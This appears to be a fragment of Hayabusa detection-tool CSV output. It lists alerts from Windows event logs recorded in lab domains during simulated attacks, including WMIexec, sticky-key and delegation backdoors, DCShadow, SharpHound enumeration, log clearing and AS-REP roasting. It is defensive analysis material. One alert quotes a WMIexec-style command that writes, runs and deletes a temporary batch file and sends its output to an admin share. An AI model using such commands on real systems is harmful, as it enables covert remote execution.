+2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
+2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
+2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
+2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
+2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: C:\Windows\system32\cmd.exe  /Q /c C:\Windows\TEMP\execute.bat   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd  ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
+2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47450  :  LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 34544  :  LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 45246  :  LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
+2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
+2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
+2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob  :  LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob  :  Workstation:   :  IP Address: 192.168.1.2  :  Port: 54633  :  LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob  :  Workstation:   :  IP Address: 192.168.1.2  :  Port: 54635  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
